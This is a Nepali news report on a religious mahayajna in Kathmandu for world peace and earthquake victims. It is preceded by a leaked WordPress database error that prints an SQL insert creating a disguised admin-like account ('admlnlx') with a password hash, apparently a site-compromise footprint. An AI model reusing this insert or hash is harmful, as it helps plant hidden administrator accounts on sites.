WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLP2c7i2YCKnwMn0Y7Mv18/SUlBcrr.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 11:46:43', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ १९ –
रानीबारी महिला समाज तथा ॐ बगलामुखी सेवा सङ्घ गोंगबुको संयुक्त आयोजनामा आजदेखि विश्व शान्तिको कामना गर्दै श्रीमद्देवीभागवत ज्ञान महायज्ञ गरिएको छ ।
विसं २०७२ को विनाशकारी भूकम्पमा ज्यान गुमाएका व्यक्तिको चिरशान्तिको कामना तथा पितृउद्धार एवम् राष्ट्र तथा विश्व शान्तिको कामना गर्दै आजदेखि महायज्ञ आयोजना गरिएको छ ।
सो महायज्ञको उद्घाटन गर्दै राष्ट्रकवि माधवप्रसाद घिमिरेले आफ्नो धर्म, रीतिरिवाज, परम्पराको संरक्षणमा महायज्ञले ठूलो सहयोग पुग्ने विश्वास व्यक्त गर्नुभयो ।
काठमाडौँ महानगरपालिकाका प्रमुख कार्यकारी अधिकृत रुद्रसिंह तामाङले वृद्धाश्रम निर्माणका लागि रानीबारी महिला समाजले गरेको कार्य सराहनीय रहेको उल्लेख गर्नुभयो ।
रानीबारी महिला समाजकी अध्यक्ष जुनु लोहनी, नेपाली चलचित्र क्षेत्रका महानायक राजेश हमाल, नेपाली काँग्रेस काठमाडौँका नेता खेम तिवारीलगायतले धार्मिक क्षेत्रको माध्यमबाट सामाजिक काम गर्न लागेको भन्दै उक्त कार्यप्रति सबैको सहयोग आवश्यक रहेको बताउनुभयो ।
दश दिनसम्म हुने महायज्ञमा ॐ श्री बङ्गलामुखी मातालक्ष्मी प्रमुख वाचिका तथा पण्डित अच्युत खनालले कथावाचन गर्ने कार्यक्रम रहेको छ । सो अवसरमा आज बाजागाजासहित सांस्कृतिक झाँकी र कलशयात्रा गरिएको थियो । – रासस